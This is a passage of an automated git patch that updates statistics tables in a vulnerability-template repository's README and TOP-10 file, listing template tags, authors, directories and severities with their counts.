| | | | | | | | | +| esmtp | 1 | | | | | | | | | +| etouch | 1 | | | | | | | | | +| seacms | 1 | | | | | | | | | +| openrestry | 1 | | | | | | | | | +| emc | 1 | | | | | | | | | +| opencast | 1 | | | | | | | | | +| sitecore | 1 | | | | | | | | | | chevereto | 1 | | | | | | | | | -| csrf | 1 | | | | | | | | | -| discourse | 1 | | | | | | | | | -| metinfo | 1 | | | | | | | | | -| biometrics | 1 | | | | | | | | | -| opm | 1 | | | | | | | | | -| ilo4 | 1 | | | | | | | | | -| finereport | 1 | | | | | | | | | -| flash | 1 | | | | | | | | | -| wondercms | 1 | | | | | | | | | -| fuelcms | 1 | | | | | | | | | -| dbeaver | 1 | | | | | | | | | -| jsp | 1 | | | | | | | | | -| nps | 1 | | | | | | | | | -| uwsgi | 1 | | | | | | | | | -| ilo | 1 | | | | | | | | | -| blue-ocean | 1 | | | | | | | | | -| shopxo | 1 | | | | | | | | | -| grails | 1 | | | | | | | | | -| krweb | 1 | | | | | | | | | -| sgp | 1 | | | | | | | | | -| klog | 1 | | | | | | | | | -| xunchi | 1 | | | | | | | | | -| sarg | 1 | | | | | | | | | -| sprintful | 1 | | | | | | | | | -| octobercms | 1 | | | | | | | | | -| xmlchart | 1 | | | | | | | | | +| spip | 1 | | | 
| | | | | | +| zarafa | 1 | | | | | | | | | +| timesheet | 1 | | | | | | | | | +| camera | 1 | | | | | | | | | +| visionhub | 1 | | | | | | | | | +| svn | 1 | | | | | | | | | +| sophos | 1 | | | | | | | | | +| rsyncd | 1 | | | | | | | | | +| scs | 1 | | | | | | | | | | lg-nas | 1 | | | | | | | | | -| smi | 1 | | | | | | | | | -| owa | 1 | | | | | | | | | -| default | 1 | | | | | | | | | -| wiki | 1 | | | | | | | | | -| svnserve | 1 | | | | | | | | | -| clave | 1 | | | | | | | | | -| ambari | 1 | | | | | | | | | -| argussurveillance | 1 | | | | | | | | | -| manageengine | 1 | | | | | | | | | -| heroku | 1 | | | | | | | | | -| fiori | 1 | | | | | | | | | -| zte | 1 | | | | | | | | | +| gitlist | 1 | | | | | | | | | +| wmt | 1 | | | | | | | | | +| netsweeper | 1 | | | | | | | | | +| fortinet | 1 | | | | | | | | | +| fortilogger | 1 | | | | | | | | | +| office365 | 1 | | | | | | | | | +| krweb | 1 | | | | | | | | | +| lotuscms | 1 | | | | | | | | | +| commscope | 1 | | | | | | | | | +| sco | 1 | | | | | | | | | | acontent | 1 | | | | | | | | | -| couchbase | 1 | | | | | | | | | -| cse | 1 | | | | | | | | | -| monitorr | 1 | | | | | | | | | -| opentsdb | 1 | | | | | | | | | -| node-red-dashboard | 1 | | | | | | | | | +| xiuno | 1 | | | | | | | | | +| default | 1 | | | | | | | | | +| octobercms | 1 | | | | | | | | | +| htmli | 1 | | | | | | | | | +| qsan | 1 | | | | | | | | | | avtech | 1 | | | | | | | | | -| weiphp | 1 | | | | | | | | | -| pgadmin | 1 | | | | | | | | | -| kyan | 1 | | | | | | | | | -| rfi | 1 | | | | | | | | | -| mpsec | 1 | | | | | | | | | -| linksys | 1 | | | | | | | | | -| asus | 1 | | | | | | | | | -| expressjs | 1 | | | | | | | | | -| harbor | 1 | | | | | | | | | -| mongoshake | 1 | | | | | | | | | -| trane | 1 | | | | | | | | | -| cloudinary | 1 | | | | | | | | | -| yealink | 1 | | | | | | | | | -| circontrorl | 1 | | | | | | | | | +| dotclear | 1 | | | | | | | | | +| kafdrop | 1 | | | | | | | | | +| dnssec | 1 | | | | | | | | | +| portainer | 1 | 
| | | | | | | | +| gloo | 1 | | | | | | | | | +| webmodule-ee | 1 | | | | | | | | | +| eyelock | 1 | | | | | | | | | +| solman | 1 | | | | | | | | | +| dom | 1 | | | | | | | | | +| vnc | 1 | | | | | | | | | +| domxss | 1 | | | | | | | | | +| plc | 1 | | | | | | | | | +| k8 | 1 | | | | | | | | | +| addpac | 1 | | | | | | | | | +| upload | 1 | | | | | | | | | +| webadmin | 1 | | | | | | | | | +| clockwatch | 1 | | | | | | | | | +| api-manager | 1 | | | | | | | | | +| appweb | 1 | | | | | | | | | +| lighttpd | 1 | | | | | | | | | +| aura | 1 | | | | | | | | | +| mobileiron | 1 | | | | | | | | | +| robomongo | 1 | | | | | | | | | +| flink | 1 | | | | | | | | | +| embedthis | 1 | | | | | | | | | +| ewebs | 1 | | | | | | | | | +| parentlink | 1 | | | | | | | | | | tongda | 1 | | | | | | | | | +| blue-ocean | 1 | | | | | | | | | +| woocomernce | 1 | | | | | | | | | +| wamp | 1 | | | | | | | | | +| tileserver | 1 | | | | | | | | | +| triconsole | 1 | | | | | | | | | +| csod | 1 | | | | | | | | | +| sentry | 1 | | | | | | | | | +| qvisdvr | 1 | | | | | | | | | +| expn | 1 | | | | | | | | | +| kubeflow | 1 | | | | | | | | | +| ntopng | 1 | | | | | | | | | +| camunda | 1 | | | | | | | | | +| spf | 1 | | | | | | | | | +| servicenow | 1 | | | | | | | | | +| setup | 1 | | | | | | | | | +| eyou | 1 | | | | | | | | | +| b2evolution | 1 | | | | | | | | | +| vsphere | 1 | | | | | | | | | +| thinkadmin | 1 | | | | | | | | | +| alertmanager | 1 | | | | | | | | | +| expressjs | 1 | | | | | | | | | +| phalcon | 1 | | | | | | | | | +| sceditor | 1 | | | | | | | | | +| wiki | 1 | | | | | | | | | +| gotmls | 1 | | | | | | | | | +| totaljs | 1 | | | | | | | | | +| discord | 1 | | | | | | | | | +| xmlchart | 1 | | | | | | | | | +| smartblog | 1 | | | | | | | | | +| tjws | 1 | | | | | | | | | +| mariadb | 1 | | | | | | | | | +| eprints | 1 | | | | | | | | | +| tika | 1 | | | | | | | | | +| soar | 1 | | | | | | | | | +| blind | 1 | | | | | | | | | +| mediumish | 1 | | | | | | | | | +| flash | 
1 | | | | | | | | | +| liferay | 1 | | | | | | | | | +| mysql | 1 | | | | | | | | | +| apiman | 1 | | | | | | | | | +| wavlink | 1 | | | | | | | | | +| dvwa | 1 | | | | | | | | | +| email | 1 | | | | | | | | | +| mautic | 1 | | | | | | | | | +| pcoip | 1 | | | | | | | | | +| dotnet | 1 | | | | | | | | | +| alerta | 1 | | | | | | | | | +| wifisky | 1 | | | | | | | | | +| upnp | 1 | | | | | | | | | +| owasp | 1 | | | | | | | | | +| webui | 1 | | | | | | | | | +| bullwark | 1 | | | | | | | | | +| sqlite | 1 | | | | | | | | | +| cocoon | 1 | | | | | | | | | +| scimono | 1 | | | | | | | | | +| pagespeed | 1 | | | | | | | | | +| achecker | 1 | | | | | | | | | +| qcubed | 1 | | | | | | | | | +| ecom | 1 | | | | | | | | | +| harbor | 1 | | | | | | | | | +| webmin | 1 | | | | | | | | | +| websvn | 1 | | | | | | | | | +| octoprint | 1 | | | | | | | | | +| openerp | 1 | | | | | | | | | +| tpshop | 1 | | | | | | | | | +| fastapi | 1 | | | | | | | | | +| cgi | 1 | | | | | | | | | +| majordomo2 | 1 | | | | | | | | | +| smi | 1 | | | | | | | | | +| nordex | 1 | | | | | | | | | +| exposures | 1 | | | | | | | | | +| tamronos | 1 | | | | | | | | | +| viewlinc | 1 | | | | | | | | | +| trilithic | 1 | | | | | | | | | +| redhat | 1 | | | | | | | | | +| sprintful | 1 | | | | | | | | | +| chinaunicom | 1 | | | | | | | | | +| erp-nc | 1 | | | | | | | | | +| gogs | 1 | | | | | | | | | +| drone | 1 | | | | | | | | | +| skywalking | 1 | | | | | | | | | +| expose | 1 | | | | | | | | | +| ems | 1 | | | | | | | | | +| postmessage | 1 | | | | | | | | | +| magicflow | 1 | | | | | | | | | +| argussurveillance | 1 | | | | | | | | | +| getsimple | 1 | | | | | | | | | +| openx | 1 | | | | | | | | | +| k8s | 1 | | | | | | | | | +| opensmtpd | 1 | | | | | | | | | +| hadoop | 1 | | | | | | | | | | wooyun | 1 | | | | | | | | | -| hiboss | 1 | | | | | | | | | -| mantisbt | 1 | | | | | | | | | +| emby | 1 | | | | | | | | | +| influxdb | 1 | | | | | | | | | +| comodo | 1 | | | | | | | | | +| rmc | 1 | | | | 
| | | | | +| lancom | 1 | | | | | | | | | +| fedora | 1 | | | | | | | | | +| klog | 1 | | | | | | | | | +| cors | 1 | | | | | | | | | +| fiori | 1 | | | | | | | | | +| nweb2fax | 1 | | | | | | | | | +| synnefo | 1 | | | | | | | | | +| phpfastcache | 1 | | | | | | | | | +| bazarr | 1 | | | | | | | | | +| rabbitmq | 1 | | | | | | | | | +| empirecms | 1 | | | | | | | | | | extractor | 1 | | | | | | | | | -| cobub | 1 | | | | | | | | | +| ruby | 1 | | | | | | | | | +| default-login | 1 | | | | | | | | | +| nomad | 1 | | | | | | | | | +| iceflow | 1 | | | | | | | | | +| mpsec | 1 | | | | | | | | | +| biometrics | 1 | | | | | | | | | +| labtech | 1 | | | | | | | | | +| jmx | 1 | | | | | | | | | +| monitorix | 1 | | | | | | | | | +| owa | 1 | | | | | | | | | +| alibaba | 1 | | | | | | | | | +| turbocrm | 1 | | | | | | | | | +| mara | 1 | | | | | | | | | +| tensorboard | 1 | | | | | | | | | +| svnserve | 1 | | | | | | | | | +| announcekit | 1 | | | | | | | | | +| lansweeper | 1 | | | | | | | | | +| jquery | 1 | | | | | | | | | +| wavemaker | 1 | | | | | | | | | +| exponentcms | 1 | | | | | | | | | +| weiphp | 1 | | | | | | | | | +| enumeration | 1 | | | | | | | | | +| myucms | 1 | | | | | | | | | +| avalanche | 1 | | | | | | | | | +| springframework | 1 | | | | | | | | | +| codeigniter | 1 | | | | | | | | | +| netrc | 1 | | | | | | | | | +| opensns | 1 | | | | | | | | | +| glances | 1 | | | | | | | | | +| bedita | 1 | | | | | | | | | +| miscrsoft | 1 | | | | | | | | | +| wuzhicms | 1 | | | | | | | | | +| sgp | 1 | | | | | | | | | +| tracer | 1 | | | | | | | | | +| solarlog | 1 | | | | | | | | | +| oscommerce | 1 | | | | | | | | | +| xunchi | 1 | | | | | | | | | +| ssl | 1 | | | | | | | | | +| phpfusion | 1 | | | | | | | | | +| vsftpd | 1 | | | | | | | | | +| trane | 1 | | | | | | | | | +| postgres | 1 | | | | | | | | | +| hiboss | 1 | | | | | | | | | +| pippoint | 1 | | | | | | | | | +| mantisbt | 1 | | | | | | | | | +| primetek | 1 | | | | | | | | | +| zenario | 1 | | | | 
| | | | | +| sureline | 1 | | | | | | | | | +| acme | 1 | | | | | | | | | +| azkaban | 1 | | | | | | | | | +| ssltls | 1 | | | | | | | | | +| uwsgi | 1 | | | | | | | | | +| rhymix | 1 | | | | | | | | | +| ec2 | 1 | | | | | | | | | +| swagger | 1 | | | | | | | | | +| dbeaver | 1 | | | | | | | | | +| clink-office | 1 | | | | | | | | | +| node-red-dashboard | 1 | | | | | | | | | +| calendarix | 1 | | | | | | | | | +| javascript | 1 | | | | | | | | | +| darkstat | 1 | | | | | | | | | +| adb | 1 | | | | | | | | | +| mantis | 1 | | | | | | | | | +| subrion | 1 | | | | | | | | | +| checkpoint | 1 | | | | | | | | | +| ioncube | 1 | | | | | | | | | +| mongo | 1 | | | | | | | | | +| memcached | 1 | | | | | | | | | +| centos | 1 | | | | | | | | | +| javamelody | 1 | | | | | | | | | +| zmanda | 1 | | | | | | | | | +| netdata | 1 | | | | | | | | | +| ns | 1 | | | | | | | | | +| 2014 | 1 | | | | | | | | | +| bigbluebutton | 1 | | | | | | | | | +| plone | 1 | | | | | | | | | +| doh | 1 | | | | | | | | | +| tenda | 1 | | | | | | | | | +| starttls | 1 | | | | | | | | | +| circontrorl | 1 | | | | | | | | | +| zzzcms | 1 | | | | | | | | | +| duomicms | 1 | | | | | | | | | +| rujjie | 1 | | | | | | | | | +| dotnetnuke | 1 | | | | | | | | | +| hortonworks | 1 | | | | | | | | | +| jenzabar | 1 | | | | | | | | | +| iptime | 1 | | | | | | | | | +| bruteforce | 1 | | | | | | | | | +| goahead | 1 | | | | | | | | | +| nexusdb | 1 | | | | | | | | | +| openemr | 1 | | | | | | | | | +| servicedesk | 1 | | | | | | | | | +| twitter-server | 1 | | | | | | | | | +| jenkin | 1 | | | | | | | | | +| shopware | 1 | | | | | | | | | +| webftp | 1 | | | | | | | | | +| smartsense | 1 | | | | | | | | | +| db | 1 | | | | | | | | | +| geddy | 1 | | | | | | | | | +| wing-ftp | 1 | | | | | | | | | +| stem | 1 | | | | | | | | | +| zeroshell | 1 | | | | | | | | | +| fastcgi | 1 | | | | | | | | | +| haproxy | 1 | | | | | | | | | +| finereport | 1 | | | | | | | | | +| episerver | 1 | | | | | | | | | +| favicon | 1 
| | | | | | | | | +| adminer | 1 | | | | | | | | | +| yii | 1 | | | | | | | | | +| nuxeo | 1 | | | | | | | | | +| socomec | 1 | | | | | | | | | +| rdp | 1 | | | | | | | | | +| varnish | 1 | | | | | | | | | +| plastic | 1 | | | | | | | | | +| selea | 1 | | | | | | | | | +| xff | 1 | | | | | | | | | +| redwood | 1 | | | | | | | | | +| timeclock | 1 | | | | | | | | | +| clusterengine | 1 | | | | | | | | | +| zcms | 1 | | | | | | | | | +| ruckus | 1 | | | | | | | | | +| faraday | 1 | | | | | | | | | +| lutron | 1 | | | | | | | | | +| tensorflow | 1 | | | | | | | | | +| enum | 1 | | | | | | | | | +| nsasg | 1 | | | | | | | | | +| opentsdb | 1 | | | | | | | | | +| concrete | 1 | | | | | | | | | +| aspnuke | 1 | | | | | | | | | +| axis | 1 | | | | | | | | | +| cerebro | 1 | | | | | | | | | +| nuuo | 1 | | | | | | | | | +| moinmoin | 1 | | | | | | | | | +| panabit | 1 | | | | | | | | | +| pacsone | 1 | | | | | | | | | +| anchorcms | 1 | | | | | | | | | +| razor | 1 | | | | | | | | | +| keenetic | 1 | | | | | | | | | +| 74cms | 1 | | | | | | | | | +| optiLink | 1 | | | | | | | | | +| kerbynet | 1 | | | | | | | | | +| linksys | 1 | | | | | | | | | +| nedi | 1 | | | | | | | | | +| lanproxy | 1 | | | | | | | | | +| realteo | 1 | | | | | | | | | +| wondercms | 1 | | | | | | | | | +| qdpm | 1 | | | | | | | | | +| rubedo | 1 | | | | | | | | | +| node | 1 | | | | | | | | | +| kong | 1 | | | | | | | | | +| bash | 1 | | | | | | | | | +| xml | 1 | | | | | | | | | +| nc2 | 1 | | | | | | | | | +| h3c-imc | 1 | | | | | | | | | +| bookstack | 1 | | | | | | | | | +| jeewms | 1 | | | | | | | | | +| panos | 1 | | | | | | | | | +| landray | 1 | | | | | | | | | +| ricoh | 1 | | | | | | | | | +| jfrog | 1 | | | | | | | | | +| cloudinary | 1 | | | | | | | | | +| bitly | 1 | | | | | | | | | +| rfi | 1 | | | | | | | | | +| sarg | 1 | | | | | | | | | +| acexy | 1 | | | | | | | | | +| wildfly | 1 | | | | | | | | | +| ilo4 | 1 | | | | | | | | | +| accela | 1 | | | | | | | | | +| feifeicms | 1 | | | 
| | | | | | +| pyramid | 1 | | | | | | | | | +| ambari | 1 | | | | | | | | | +| gateone | 1 | | | | | | | | | +| csrf | 1 | | | | | | | | | +| tieline | 1 | | | | | | | | | +| druid | 1 | | | | | | | | | +| maccmsv10 | 1 | | | | | | | | | +| clave | 1 | | | | | | | | | +| linkedin | 1 | | | | | | | | | +| zyxel | 1 | | | | | | | | | +| szhe | 1 | | | | | | | | | +| sidekiq | 1 | | | | | | | | | +| logontracer | 1 | | | | | | | | | +| xvr | 1 | | | | | | | | | +| mailchimp | 1 | | | | | | | | | +| mirai | 1 | | | | | | | | | +| linux | 1 | | | | | | | | | +| sangfor | 1 | | | | | | | | | +| ilo | 1 | | | | | | | | | +| gespage | 1 | | | | | | | | | +| cofax | 1 | | | | | | | | | +| mongoshake | 1 | | | | | | | | | +| fortigate | 1 | | | | | | | | | +| tectuus | 1 | | | | | | | | | +| fuelcms | 1 | | | | | | | | | +| apos | 1 | | | | | | | | | +| floc | 1 | | | | | | | | | +| kyan | 1 | | | | | | | | | +| phpinfo | 1 | | | | | | | | | +| perl | 1 | | | | | | | | | +| visualtools | 1 | | | | | | | | | +| resourcespace | 1 | | | | | | | | | +| shopxo | 1 | | | | | | | | | +| auth | 1 | | | | | | | | | +| discourse | 1 | | | | | | | | | +| ueditor | 1 | | | | | | | | | +| cherokee | 1 | | | | | | | | | +| circontrol | 1 | | | | | | | | | +| openstack | 1 | | | | | | | | | +| centreon | 1 | | | | | | | | | +| moin | 1 | | | | | | | | | +| sourcebans | 1 | | | | | | | | | +| gridx | 1 | | | | | | | | | +| spidercontrol | 1 | | | | | | | | | +| yealink | 1 | | | | | | | | | +| xdcms | 1 | | | | | | | | | +| powercreator | 1 | | | | | | | | | +| fortigates | 1 | | | | | | | | | +| nps | 1 | | | | | | | | | +| yachtcontrol | 1 | | | | | | | | | +| arl | 1 | | | | | | | | | +| cacti | 1 | | | | | | | | | +| metinfo | 1 | | | | | | | | | +| tapestry | 1 | | | | | | | | | +| aruba | 1 | | | | | | | | | +| sar2html | 1 | | | | | | | | | +| crm | 1 | | | | | | | | | +| opm | 1 | | | | | | | | | +| cve2006 | 1 | | | | | | | | | +| pgadmin | 1 | | | | | | | | | +| codemeter | 1 | | 
| | | | | | | +| simplecrm | 1 | | | | | | | | | +| zend | 1 | | | | | | | | | +| bolt | 1 | | | | | | | | | +| salesforce | 1 | | | | | | | | | +| asus | 1 | | | | | | | | | +| redis | 1 | | | | | | | | | +| spring | 1 | | | | | | | | | +| manageengine | 1 | | | | | | | | | +| commax | 1 | | | | | | | | | +| jitsi | 1 | | | | | | | | | +| pulsesecure | 1 | | | | | | | | | +| spectracom | 1 | | | | | | | | | +| heroku | 1 | | | | | | | | | +| froxlor | 1 | | | | | | | | | +| dompdf | 1 | | | | | | | | | +| ulterius | 1 | | | | | | | | | | dvr | 1 | | | | | | | | | | plugin | 1 | | | | | | | | | -| dotnet | 1 | | | | | | | | | -| liferay | 1 | | | | | | | | | -| jquery | 1 | | | | | | | | | -| fortigate | 1 | | | | | | | | | | jnoj | 1 | | | | | | | | | -| geddy | 1 | | | | | | | | | -| timeclock | 1 | | | | | | | | | -| ns | 1 | | | | | | | | | -| influxdb | 1 | | | | | | | | | -| nexusdb | 1 | | | | | | | | | -| acexy | 1 | | | | | | | | | -| pippoint | 1 | | | | | | | | | -| clockwatch | 1 | | | | | | | | | -| feifeicms | 1 | | | | | | | | | -| favicon | 1 | | | | | | | | | -| hortonworks | 1 | | | | | | | | | -| stem | 1 | | | | | | | | | -| lansweeper | 1 | | | | | | | | | -| gridx | 1 | | | | | | | | | -| qvisdvr | 1 | | | | | | | | | -| tamronos | 1 | | | | | | | | | -| landrayoa | 1 | | | | | | | | | -| sentry | 1 | | | | | | | | | -| zcms | 1 | | | | | | | | | -| shopware | 1 | | | | | | | | | -| bullwark | 1 | | | | | | | | | -| opensns | 1 | | | | | | | | | -| fortiweb | 1 | | | | | | | | | -| dom | 1 | | | | | | | | | -| darkstat | 1 | | | | | | | | | -| pagespeed | 1 | | | | | | | | | -| pacsone | 1 | | | | | | | | | -| zookeeper | 1 | | | | | | | | | -| labtech | 1 | | | | | | | | | -| servicenow | 1 | | | | | | | | | -| rujjie | 1 | | | | | | | | | -| mysql | 1 | | | | | | | | | -| esmtp | 1 | | | | | | | | | -| qdpm | 1 | | | | | | | | | -| sar2html | 1 | | | | | | | | | -| comodo | 1 | | | | | | | | | -| myucms | 1 | | | | | | | | | -| rsyncd | 1 | 
| | | | | | | | +| sage | 1 | | | | | | | | | | cyberoam | 1 | | | | | | | | | -| wing-ftp | 1 | | | | | | | | | -| glpi | 1 | | | | | | | | | -| openstack | 1 | | | | | | | | | -| k8 | 1 | | | | | | | | | -| javamelody | 1 | | | | | | | | | -| oscommerce | 1 | | | | | | | | | -| gotmls | 1 | | | | | | | | | -| oneblog | 1 | | | | | | | | | -| openrestry | 1 | | | | | | | | | -| bookstack | 1 | | | | | | | | | -| emc | 1 | | | | | | | | | -| tileserver | 1 | | | | | | | | | -| springframework | 1 | | | | | | | | | -| centos | 1 | | | | | | | | | -| bitly | 1 | | | | | | | | | -| seacms | 1 | | | | | | | | | -| centreon | 1 | | | | | | | | | -| circontrol | 1 | | | | | | | | | -| jeewms | 1 | | | | | | | | | -| bolt | 1 | | | | | | | | | -| zeroshell | 1 | | | | | | | | | -| jitsi | 1 | | | | | | | | | -| phpunit | 1 | | | | | | | | | -| ec2 | 1 | | | | | | | | | -| nuuo | 1 | | | | | | | | | -| interlib | 1 | | | | | | | | | -| anchorcms | 1 | | | | | | | | | -| vsftpd | 1 | | | | | | | | | -| nette | 1 | | | | | | | | | -| yachtcontrol | 1 | | | | | | | | | -| glances | 1 | | | | | | | | | -| openx | 1 | | | | | | | | | -| spectracom | 1 | | | | | | | | | -| froxlor | 1 | | | | | | | | | -| wavlink | 1 | | | | | | | | | -| phpfusion | 1 | | | | | | | | | -| woocomernce | 1 | | | | | | | | | -| eyou | 1 | | | | | | | | | -| synnefo | 1 | | | | | | | | | -| goahead | 1 | | | | | | | | | -| 74cms | 1 | | | | | | | | | -| discord | 1 | | | | | | | | | -| cacti | 1 | | | | | | | | | -| zenario | 1 | | | | | | | | | -| faraday | 1 | | | | | | | | | -| kubeflow | 1 | | | | | | | | | -| erp-nc | 1 | | | | | | | | | -| emby | 1 | | | | | | | | | -| wavemaker | 1 | | | | | | | | | -| kafdrop | 1 | | | | | | | | | -| robomongo | 1 | | | | | | | | | -| crm | 1 | | | | | | | | | -| tieline | 1 | | | | | | | | | -| fortigates | 1 | | | | | | | | | -| rubedo | 1 | | | | | | | | | -| logontracer | 1 | | | | | | | | | -| bigbluebutton | 1 | | | | | | | | | -| tectuus | 1 | | | | | 
| | | | -| embedthis | 1 | | | | | | | | | -| fastcgi | 1 | | | | | | | | | -| moin | 1 | | | | | | | | | -| proftpd | 1 | | | | | | | | | -| sophos | 1 | | | | | | | | | -| nsasg | 1 | | | | | | | | | -| tracer | 1 | | | | | | | | | -| druid | 1 | | | | | | | | | -| pulsesecure | 1 | | | | | | | | | -| gogs | 1 | | | | | | | | | -| servicedesk | 1 | | | | | | | | | -| optiLink | 1 | | | | | | | | | -| lotuscms | 1 | | | | | | | | | -| flink | 1 | | | | | | | | | -| avalanche | 1 | | | | | | | | | -| ntopng | 1 | | | | | | | | | -| perl | 1 | | | | | | | | | -| nc2 | 1 | | | | | | | | | -| enum | 1 | | | | | | | | | -| ewebs | 1 | | | | | | | | | -| openerp | 1 | | | | | | | | | -| geutebruck | 1 | | | | | | | | | -| ssl | 1 | | | | | | | | | -| wmt | 1 | | | | | | | | | -| phpfastcache | 1 | | | | | | | | | -| mariadb | 1 | | | | | | | | | -| webadmin | 1 | | | | | | | | | -| mediumish | 1 | | | | | | | | | -| cgi | 1 | | | | | | | | | -| nweb2fax | 1 | | | | | | | | | -| turbocrm | 1 | | | | | | | | | -| enumeration | 1 | | | | | | | | | -| dompdf | 1 | | | | | | | | | -| fedora | 1 | | | | | | | | | -| sourcebans | 1 | | | | | | | | | -| skywalking | 1 | | | | | | | | | -| ruckus | 1 | | | | | | | | | -| websvn | 1 | | | | | | | | | -| nomad | 1 | | | | | | | | | -| keenetic | 1 | | | | | | | | | -| clusterengine | 1 | | | | | | | | | -| spidercontrol | 1 | | | | | | | | | -| gespage | 1 | | | | | | | | | -| vnc | 1 | | | | | | | | | -| tensorflow | 1 | | | | | | | | | -| expose | 1 | | | | | | | | | -| solarlog | 1 | | | | | | | | | -| swagger | 1 | | | | | | | | | -| office365 | 1 | | | | | | | | | -| apiman | 1 | | | | | | | | | -| plastic | 1 | | | | | | | | | -| adb | 1 | | | | | | | | | -| ulterius | 1 | | | | | | | | | -| tapestry | 1 | | | | | | | | | -| sco | 1 | | | | | | | | | -| 2014 | 1 | | | | | | | | | -| exposures | 1 | | | | | | | | | -| majordomo2 | 1 | | | | | | | | | -| selea | 1 | | | | | | | | | -| tika | 1 | | | | | | | | | -| primetek | 1 
| | | | | | | | | -| mantis | 1 | | | | | | | | | -| portainer | 1 | | | | | | | | | -| ems | 1 | | | | | | | | | -| dnssec | 1 | | | | | | | | | -| fastapi | 1 | | | | | | | | | -| xvr | 1 | | | | | | | | | -| aruba | 1 | | | | | | | | | -| xff | 1 | | | | | | | | | -| varnish | 1 | | | | | | | | | -| csod | 1 | | | | | | | | | -| h3c-imc | 1 | | | | | | | | | -| octoprint | 1 | | | | | | | | | -| saltapi | 1 | | | | | | | | | -| cofax | 1 | | | | | | | | | -| zmanda | 1 | | | | | | | | | -| miscrsoft | 1 | | | | | | | | | -| blackboard | 1 | | | | | | | | | -| lighttpd | 1 | | | | | | | | | -| redwood | 1 | | | | | | | | | -| camera | 1 | | | | | | | | | -| accela | 1 | | | | | | | | | -| phpinfo | 1 | | | | | | | | | -| totaljs | 1 | | | | | | | | | -| thinkadmin | 1 | | | | | | | | | -| xiuno | 1 | | | | | | | | | -| commscope | 1 | | | | | | | | | -| b2evolution | 1 | | | | | | | | | -| opencast | 1 | | | | | | | | | -| db | 1 | | | | | | | | | -| xml | 1 | | | | | | | | | -| episerver | 1 | | | | | | | | | -| postmessage | 1 | | | | | | | | | -| parentlink | 1 | | | | | | | | | -| jfrog | 1 | | | | | | | | | -| ueditor | 1 | | | | | | | | | -| empirecms | 1 | | | | | | | | | | netgenie | 1 | | | | | | | | | -| htmli | 1 | | | | | | | | | -| haproxy | 1 | | | | | | | | | -| netdata | 1 | | | | | | | | | -| alertmanager | 1 | | | | | | | | | -| dvwa | 1 | | | | | | | | | -| opensmtpd | 1 | | | | | | | | | -| qcubed | 1 | | | | | | | | | -| zyxel | 1 | | | | | | | | | -| tpshop | 1 | | | | | | | | | -| simplecrm | 1 | | | | | | | | | -| trilithic | 1 | | | | | | | | | -| k8s | 1 | | | | | | | | | -| mobileiron | 1 | | | | | | | | | -| cocoon | 1 | | | | | | | | | -| gitlist | 1 | | | | | | | | | +| grails | 1 | | | | | | | | | +| nette | 1 | | | | | | | | | +| zte | 1 | | | | | | | | | +| rmi | 1 | | | | | | | | | +| cloudflare | 1 | | | | | | | | | +| ghost | 1 | | | | | | | | | +| cobub | 1 | | | | | | | | | +| landrayoa | 1 | | | | | | | | | +| oneblog | 1 | 
| | | | | | | | +| zm | 1 | | | | | | | | | +| couchbase | 1 | | | | | | | | | | idemia | 1 | | | | | | | | | -| traefik | 1 | | | | | | | | | -| linkedin | 1 | | | | | | | | | -| jenkin | 1 | | | | | | | | | -| postgres | 1 | | | | | | | | | -| api-manager | 1 | | | | | | | | | -| nuxeo | 1 | | | | | | | | | -| nordex | 1 | | | | | | | | | -| domxss | 1 | | | | | | | | | -| prestashop | 1 | | | | | | | | | -| addpac | 1 | | | | | | | | | -| mdb | 1 | | | | | | | | | -| sitecore | 1 | | | | | | | | | -| viewlinc | 1 | | | | | | | | | -| moinmoin | 1 | | | | | | | | | -| ecom | 1 | | | | | | | | | -| fortinet | 1 | | | | | | | | | -| vsphere | 1 | | | | | | | | | -| lanproxy | 1 | | | | | | | | | -| sqlite | 1 | | | | | | | | | -| apos | 1 | | | | | | | | | -| cors | 1 | | | | | | | | | -| scimono | 1 | | | | | | | | | -| drone | 1 | | | | | | | | | -| nedi | 1 | | | | | | | | | -| iptime | 1 | | | | | | | | | -| starttls | 1 | | | | | | | | | -| tensorboard | 1 | | | | | | | | | +| diris | 1 | | | | | | | | | +| jsp | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index affcdde18b..9516a71bfa 100644 --- a/TOP-10.md +++ b/TOP-10.md 
@@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 624 | pikpikcu | 243 | cves | 631 | info | 592 | http | 1785 | -| panel | 222 | dhiyaneshdk | 240 | vulnerabilities | 281 | high | 504 | file | 46 | -| xss | 221 | pdteam | 196 | exposed-panels | 225 | medium | 398 | network | 38 | -| exposure | 212 | daffainfo | 160 | exposures | 182 | critical | 230 | dns | 11 | -| wordpress | 203 | geeknik | 149 | technologies | 160 | low | 161 | | | -| lfi | 203 | dwisiswant0 | 131 | misconfiguration | 125 | | | | | -| rce | 189 | gy741 | 71 | takeovers | 71 | | | | | +| cve | 632 | dhiyaneshdk | 245 | cves | 640 | info | 603 | http | 1807 | +| panel | 232 | pikpikcu | 244 | vulnerabilities | 283 | high | 510 | file | 46 | +| xss | 224 | pdteam | 198 | exposed-panels | 231 | medium | 402 | network | 38 | +| exposure | 214 | daffainfo | 164 | exposures | 184 | critical | 232 | dns | 11 | +| lfi | 207 | geeknik | 149 | technologies | 163 | low | 160 | | | +| wordpress | 203 | dwisiswant0 | 132 | misconfiguration | 125 | | | | | +| rce | 189 | gy741 | 72 | takeovers | 71 | | | | | | cve2020 | 157 | madrobot | 62 | default-logins | 51 | | | | | -| wp-plugin | 136 | princechaddha | 53 | file | 46 | | | | | -| cve2021 | 103 | pussycat0x | 42 | workflows | 35 | | | | | +| wp-plugin | 136 | princechaddha | 54 | file | 46 | | | | | +| tech | 105 | pussycat0x | 44 | workflows | 35 | | | | | From e4f918b7472f2d6edf833e62a83c6168e20a5aca Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 25 Aug 2021 23:11:49 +0000 Subject: [PATCH 46/52] Auto Update README [Wed Aug 25 23:11:49 UTC 2021] :robot: --- README.md | 20 ++++++++++---------- 1 file changed, 10 insertions(+), 10 deletions(-) diff --git a/README.md b/README.md index fba79152e9..ee37e1923f 100644 --- a/README.md +++ b/README.md 
